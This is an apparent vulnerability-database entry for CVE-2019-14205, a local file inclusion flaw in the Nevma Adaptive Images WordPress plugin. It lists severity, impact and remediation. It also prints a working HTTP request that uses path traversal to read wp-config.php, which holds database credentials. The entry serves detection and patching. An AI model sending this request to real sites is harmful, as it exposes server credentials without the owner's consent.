🔙 목록으로 돌아가기

CVE-2019-14205: WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion

TitleWordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion
Authorpikpikcu
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
RemediationUpdate to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor.
CVSS Score7.5
EPSS Score0.67086
CVE IDCVE-2019-14205
CWE IDCWE-22
Tags cve cve2019 wordpress wp-plugin lfi wp nevma vkev vuln

🔍 Vulnerability Description

WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST[‘adaptive-images-settings’][‘source_file’] parameter in adaptive-images-script.php.

🌐 HTTP Request

GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-14205.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-14205.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A